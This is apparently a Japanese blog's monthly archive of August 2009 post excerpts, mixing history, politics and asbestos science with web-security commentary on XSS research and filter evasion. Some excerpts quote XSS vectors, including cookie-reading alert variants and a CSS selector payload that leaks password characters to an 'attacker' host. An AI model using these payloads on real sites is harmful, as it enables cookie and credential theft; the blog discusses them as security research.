2009-08-01から1ヶ月間の記事一覧
上記のような名前の、Mario Heiderich 氏によるスライドがあります。CONFidence2009 OWASP2009 in Krakow における講演に使ったスライドのようです。このスライドの47ページから50ページにかけて「The same domain inclusion problem」というテーマで「multi…
アスベストが肺の悪性腫瘍の原因となることは知られていたけれどもその理由が従来不明であったらしいですね。ところが最近わかっちゃったらしい…その原因は通常の肺がんにも適用できるとのことで、しかもタバコが悪さすることの具体的な作用までわかっちゃっ…
・・・なんですって、びっくり。 ウルチ米用の米の原産地であるインドの古代語サンスクリットで「米」のことを「ウリヒ(urihi)」と言い、東南アジアの各言語で受容され(省略)、さらには日本語にも外来語として入ってきて「ウルチ(uruchi)」が誕生したとの…
THE ULTIMATE IDS SMACKDOWN::Gareth Heyes and Mario Heiderich for OWASP London,07.2009 上記PDFは、2009年7月のOWASP London大会での資料です。 21ページあたりにYosuke Hasegawa script without a-z0-9が紹介されていました。 原型とどめてないし(w さ…
人間は社会的生物ではなく社会創造的生物であること、天賦の人権などはそもそも幻想であって人権は不断の努力で人間自らが勝ち取り続けなくてはいけないものであること、先日の日記で書いたのでした。ここまで書いて時間切れになり、本当に書きたかったこと…
上のふたつのパラドキシカルな命題は、ともに、人間の主体性の問題だと思います。 渋谷政治学で学んだ具体的な成就の手段は、人間を造り返るための長期的なコミュニケーションと教育です。 人間が、いかに民主主義社会を支えきるだけの存在に成長するかがポ…
渋谷政治学で学んだもうひとつの大いなるパラドックスがあります。渋谷先生曰く、『天賦の人権』なんてそもそもない、『人権は継続的に勝ち取っていくもの』であると。自由や平等は神が与えたり保障してくれるものではない、私たち人間が造り出す努力が求め…
人間は社会的生物である、と言われることがあります。子供の頃からこの言葉は私にとって馴染みがありました。受験勉強も終え大学に入ってまもない1年生の頃に受講した渋谷先生による政治学講義で、人間は社会的生物ではない、と教わり、強く印象に残りました…
伊都国は江戸かもという妄説をメモしたのですが、その後気がついたことがあり、さらにメモをしてみます。 卑弥呼の時代に大国である魏と外交関係を持ったわけですが、いったいぜんたい通訳者はどんな人物なんでしょうか。蓋然性が高く一番ふさわしい者は、お…
というようなことが「うヨーク諸君」のあいだで蔓延しているらしい。(本当だから驚いちまう) きっかけはどうやら皇太子が言い放った、さまざまな諸勢力からの皇太子妃への人格攻撃についての暴露のようだ。「うヨーク諸君」は皇室内部に保護すべき人格など…
せんそうーせいぎー Q:老人子供ご婦人などもあっというまに命を落とす都市等への無差別爆撃。世界史上で大規模な無差別爆撃を最初に行ったワルーイ国ってどーこだ? A:大日本帝国。中華民国蒋介石政権が政権中枢を南京から重慶に移した後、我らが皇軍の…
大間違いをしていたので。
これがまた邪馬台国と関係が
倭人伝の伊都国は糸島半島であるというのが定説なんだけれども。なんか府におちない。無茶な想像をひとつ。当時の倭人が倭人語で「え」の「つ」、すなわち漢字で書けば「江津」を意識していたとしたなら?古代地名を検索すると、「江津」が佐賀県は有明海沿…
・・・が直っていた。URLアドレスを偽装できるのであったのだけれども。ちゃんと報告しておいて良かった。HTMLページに埋め込まれた画像とかフラッシュとかを拾いに行くときにそのURLをアドレスバーに表示するケースがあって、うっかりとアドレスバーを本来…
遊びに来ている某公的機関に備えつきのブラウザにはプロキシがかかっていてまことに不思議なことにbakera.jp/htmlbbsの新生鳩丸掲示板を見ることができませんったらありゃしないので残念な思いをしました。どうやらプロキシのブラックリストに登録されている…
T.Teradaさんによる実例を拝見して 2009-07-18のT.Teradaさんの日記の『括弧なしのXSS』という題名の記事を興味深く読ませて頂きました。実際に実例があったのですねぇ。ため息。 括弧なしのXSSという題材については、その後、Our Favorite XSS Filters/IDS …
http://wizardbible.org/32/kanatoko.txthttp://www.tietew.jp/articles/2007/02/07/misunderstood-html-escaping・あが「あ」であると認識する ・ページの文字コードが【なにか】であると認識する ・「あ」のパーセントエンコードが必要であると認識する ・…
自室のパソコンだけが知っている自分で作ったサイトのHTTPOnlyなCookieがIEに保存されていました。でもね、そのサーバには、cookieを吐き出すようなスクリプトはひとつもありません、というかサーバサイドで唯一親しみのあるPerlをこれから勉強しようとして…
ええと。大垣さんが書いたウェブアプリのセキュリティについての入門本の130ページあたりを読んでいました。そこにまったく理解できないXSSアタックのベクタが書いてあって、その破壊力は震撼しなくてはいけないぐらいです。って恐れているのは私だけで、既…
私がパソコンに興味を持って使い始めたときには既にコンピュータゲームは市場が形成されていました。私は趣味が悪くて、流行のゲームよりもオールドスタイルなゲームをよく好んで遊んだものです。視覚にちょっと弱点をかかえているのでテキスト中心のほうが…
セキュリティに興味がある皆様、ぜひお読みください。コンピュータネットワーク世界が成立する前の古い時代からのサイドチャネル攻撃の事例など歴史も学べて非常に面白いです。 最新のテクノロジーではどこまで可能なのかについても。 すでに重要インフラに…
alert(document.cookie) alert(document['cookie']) with(document)alert(cookie)少々前ならばFirefoxではだいたい以下のようなことが出来た記憶があります。[,],.を使わないですむあれな感じで。alert( eval('cookie',eval('document',window)) )evalの第二…
pure css-based XSS attacks ?<style>input[name=password][value*=a]{ background:url('//attacker?log[]=a'); }</style> <iframe seamless src=”login.asp”/> HTML5 includes "seamless" iframes could allow for pure css-based XSS attacks このようなベクタがもしも近い将来において実現するならば極めて</iframe>…